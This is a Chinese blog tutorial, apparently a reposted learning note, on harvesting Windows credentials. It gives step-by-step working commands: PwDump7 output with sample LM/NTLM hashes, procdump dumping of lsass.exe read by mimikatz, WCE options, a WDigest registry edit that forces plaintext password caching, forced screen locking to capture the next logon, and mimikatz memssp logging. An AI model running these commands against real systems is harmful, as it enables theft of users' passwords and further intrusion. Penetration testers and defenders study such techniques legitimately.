Windows密码凭证获取学习(下)

简介: Windows密码凭证获取学习

4.4 PwDump7


工具下载地址:

https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump7.zip

image.png


4.4.1 server2003


可以在Windows2003上执行,手工将得到的结果保存在1.txt中:

PwDump7.exe > 1.txt

Administrator:500:F0D412BD764FFE81AAD3B435B51404EE:209C6174DA490CAEB422F3FA5A7AE634:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:E0BD9A807066324A42B519FF5BEFF787:::
IUSR_TEST-D19EBC014E:1003:D4A491469B36E4DEDFF5B37B55778470:2471C03E798817564147AAA062FE8E22:::
IWAM_TEST-D19EBC014E:1004:CE5EF4E001CFA44F29C8D4F0A6CA5261:15F2DD2C17E53DD2FB0E43A1F6B1DFD6:::
ASPNET:1006:6FF5F98464BA40B4762AEFFACC0990D3:E1C2E3693E2A0392D8F625BB47CA78C1:::
test:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::


4.4.2 windows10



4.5 Procdump+Mimikatz


ProcDump是一个命令行程序,可以将系统正在运行的进程转存储生成为dump文件,微软自己的工具,理论上来说不应该会被杀。它的原理是Procdump导出lsass.exe的转储文件,使用mimikatz读取器中的hash。

如果对方机器是win10以下的,都可以获取明文密码。

下载地址:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

使用方法:

dumplsass.exe

32位:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
64位:
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

mimikatz读取:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full


4.5.1 server2003


无法使用

4.5.2 Windows10

执行命令:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

然后使用mimikatz读取:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full


4.6 WCE


官网地址:https://www.ampliasecurity.com/research.html

32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

参数解释:
-l          列出登录的会话和NTLM凭据(默认值)
-s               修改当前登录会话的NTLM凭据 参数:<用户名>:<域名>:<LM哈希>:<NT哈希>
-r                不定期的列出登录的会话和NTLM凭据,如果找到新的会话,那么每5秒重新列出一次
-c               用一个特殊的NTML凭据运行一个新的会话 参数:<cmd>
-e               不定期的列出登录的会话和NTLM凭据,当产生一个登录事件的时候重新列出一次
-o               保存所有的输出到一个文件 参数:<文件名>
-i                指定一个LUID代替使用当前登录会话 参数:<luid>
-d               从登录会话中删除NTLM凭据 参数:<luid>
-a               使用地址 参数: <地址>
-f                强制使用安全模式
-g               生成LM和NT的哈希 参数<密码>
-K               缓存kerberos票据到一个文件(unix和windows wce格式)
-k               从一个文件中读取kerberos票据并插入到windows缓存中
-w              通过摘要式认证缓存一个明文的密码
-v               详细输出

使用方法:wce.exe -l或者直接wce


4.6.1 server2003



4.6.2 Windows10


无法使用:

4.6.3 Windows7

正常执行:


5. Windows获取明文密码


在这里主要是获取Windows高版本的明文密码,因为在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

本次环境Windows server2012,本文默认已获取system权限的情况下进行操作。

而且本文不讨论抓取密码工具或方法的免杀方式。


6. 获取明文密码方法


6.1 修改注册表


前提条件:

  • system权限
  • • 需要锁屏后重新登录

在这里依旧使用mimikatz进行密码的抓取,默认情况下是无法获取明文信息的:

privilege::debug 
提升权限,返回Privilege '20' OK。说明权限提升成功
sekurlsa::logonpasswords
可以读取到NTLM哈希值

使用命令行将其修改成记录明文密码,在这里需要注意使用管理员权限来执行:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

再使用命令锁屏:(这个命令可以使用用户权限来执行)

rundll32.exe user32.dll,LockWorkStation

接下来等待用户再次登录一次就可以抓到了:

如果说在修改之后抓取到了密码,想要恢复对方的注册表,只需要执行下面的命令即可:(依旧需要使用管理员权限)

修改不记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

再次重启下就可以了:(锁屏无效)

privilege::debug 
提升权限,返回Privilege '20' OK。说明权限提升成功
sekurlsa::logonpasswords
可以读取到NTLM哈希值


6.2 mimikatz插ssp记录密码


需要的条件:

  • system权限
  • • 锁屏并重新登入

在这里使用mimikatz来实现:

privilege::debug
misc::memssp

修改完之后使用以下命令锁屏:rundll32.exe user32.dll,LockWorkStation

然后在以下目录下发现明文密码:

C:\Windows\System32\mimilsa.log


7. 总结


其实还有很多的其他方法,在这里就不进行一个个演示了,而且在这里并没有对其是否免杀的能力进行测试,对于不同的环境,免杀的方法也不相同,等以后有时间再学习下。

相关文章
|
4月前
|
存储 C语言 C++
[笔记]windows逆向学习
[笔记]windows逆向学习
|
5天前
|
数据安全/隐私保护 Windows
windows密码获取 -- mimikatz
windows密码获取 -- mimikatz
5 0
|
3月前
|
安全 数据安全/隐私保护
windows10 查看已连接wifi的密码
windows10 查看已连接wifi的密码
118 0
|
25天前
|
机器人 Linux 数据安全/隐私保护
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)
36 0
|
1月前
|
机器人 Linux 数据安全/隐私保护
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)(下)
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)
37 0
|
1月前
|
Linux Python Windows
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)(上)
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)
26 0
|
2月前
|
SQL 关系型数据库 MySQL
Trinitycore学习之windows上用cmake生成vs项目并尝试在windows上启动服务
Trinitycore学习之windows上用cmake生成vs项目并尝试在windows上启动服务
32 0
|
2月前
|
NoSQL MongoDB 数据库
MongoDB【部署 03】Windows系统安装mongodb并设置用户名密码(无需安装mongosh)及SpringBoot集成报错 Command failed with error 18
MongoDB【部署 03】Windows系统安装mongodb并设置用户名密码(无需安装mongosh)及SpringBoot集成报错 Command failed with error 18
68 0
|
3月前
|
网络协议 安全 Linux
windows系统开发常用cmd命令学习
在 cmd 命令中,按键盘的向上箭头可以快速切换历史前后命令,敲 Tab 可自动补全路径
74 0
|
3月前
|
存储 Cloud Native Linux
CMake学习之windows下cmake生成nmake
CMake学习之windows下cmake生成nmake